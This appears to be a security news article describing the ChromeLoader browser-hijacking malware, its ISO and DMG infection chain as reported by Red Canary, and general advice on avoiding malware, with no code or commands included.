There has been a sudden spike in browser hijacking campaigns by using ChromeLoader malware.
A new activity has been detected as of late as per Aedan Russell from Red Canary. He said that the attackers have been aiming to hijack browsers through “pervasive and persistent” ChromeLoader malware. It has the ability to modify browser settings and redirects a user to various advertisements.
Such types of campaigns are known as malvertising campaigns. These are motivated financially as the attackers are usually associated with a huge network of marketing affiliates. Hence, they redirect users to advertising sites.
What Is ChromeLoader?
In case you have no idea what ChromeLoader is, let us give you a brief overview. A ChromeLoader is an extension of the Chrome browser. Its job is to change web browser settings in order to show search results that would grab a user’s attention and make them download unwanted software, visit adult games platforms or dating sites, and even invite them to participate in fake surveys.
Among other browser hijackers, ChromeLoader is notoriously known for its persistence, volume (involving abuse of PowerShell), and its infection route.
How Does ChromeLoader Malware Work?
According to a blog post of Red Canary, to invade the system, the malware operators use a malicious ISO archive file. Through this file, they attract users by offering a cracked executable for a video game or software to download from suspicious torrents or sites. Such malware operators, at times, also use Twitter to promote their malicious executable files.
In Windows 10 or updated systems, once the file is double-clicked by a user, you can imagine it being mounted on the device as a virtual CD-ROM drive. Even though it may appear as a keygen or a game crack with the title Fortnite_Installer.exe, once you execute the file, you may end up unleashing malware that can overtake your system.
The ChromeLoader executes a PowerShell command in order to call an archive from a remote source and gets the malicious file loaded as a Chrome extension. After that PowerShell gets rid of the scheduled task and goes about infecting Chrome all the while using the infected extension to manipulate the browser search results unbeknownst to you.
According to Red Canary researchers, they believe ChromeLoader operators also make macOS systems their targets. They manipulate Chrome and Safari web browsers. The infection chain is carried out in a similar manner for macOS; however, the attackers use a DMG (Apple Disk Image) file instead of an ISO.
Also, in macOS instead of the executable file holding the installer, an installer bash script is used. It downloads and decompresses the malware extension on the private/var/temp directory.
Adware and Browser Hijacker Examples
ChromeLoader consists of advertising-supported and browser-hijacker software capabilities. When it comes to typical programs by browser hijackers, they don’t use sophisticated techniques such as ChromeLoader (as a result, the malware can possess additional malicious features like spying, data theft, and whatnot).
Here are a few examples of browser hijackers that we’ve encountered and analyzed:
- To Go Web,
- Keep Secure Search,
- Tap togo
We also analyzed the following adware:
- Fake Google Translate extension,
- Files Download Now,
- Down Assist
Regardless of how a malicious program acts, as long as it’s in the system, it can endanger device/user safety by a huge margin. That’s why it needs to be gotten rid of as soon as it is detected.
How to Avoid Installing Malware?
You must exercise caution when browsing or downloading content. You never know when you’re lured into accidentally downloading something harmful on your device, even if appears completely harmless. It’d be best for you if you download software from authentic and official sources.
Furthermore, you should activate and update software regularly and only use the tools provided by genuine developers. Acquiring from third parties can put you in jeopardy as it may contain malware.
Another tactic you can employ is to handle your incoming mail with care. The ones that look suspicious and irrelevant shouldn’t be opened as you don’t want it to lead to a system failure. An anti-virus is equally important and must be kept updated. A regular check on your system can timely warn you about the potential threats, and you can deal with them in time.
As long as you keep yourself on guard, you should be able to keep your system safe.
